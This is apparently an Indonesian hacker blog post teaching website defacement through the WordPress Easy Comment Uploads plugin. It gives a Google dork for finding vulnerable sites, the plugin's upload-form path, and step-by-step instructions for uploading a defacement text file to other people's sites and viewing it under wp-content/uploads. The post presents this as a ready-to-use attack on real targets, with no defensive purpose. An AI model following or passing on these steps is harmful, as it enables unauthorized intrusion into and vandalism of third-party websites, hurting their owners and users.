Deface PoC Exploit Wp Easy Comment Upload Plugin

Assalamualaikum Gan ...
Kali ini we akan ngasih tutorial deface lagi :v lama ya ga depes hehe....
PoC kali ini we dapet dari LinuXploit
Jadi langsung aja yak ....
File yang bisa ter upload hanya ber extensi : epub, mp4, fb2, mobi, jpg, gif, png, jpeg, pdf, prc, pdb, txt

#Google Dork :
- inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php

#Exploit :
- /wp-content/plugins/easy-comment-uploads/upload-form.php

1. Dorking dulu gan ...
2. Lalu kalian masukan exploit, tapi biasanya sudah ter exploit sendiri

3. Upload gambar atau file heked kalian berupa .txt , jika tampilan seperti berikut itu proses nya jadi tungguin
4. Lalu source nya tinggal www.target.com/wp-content/uploads/tahun/bulan/scriptkalian.txt 
contoh : www.target.com/wp-content/uploads/2020/03/heked.txt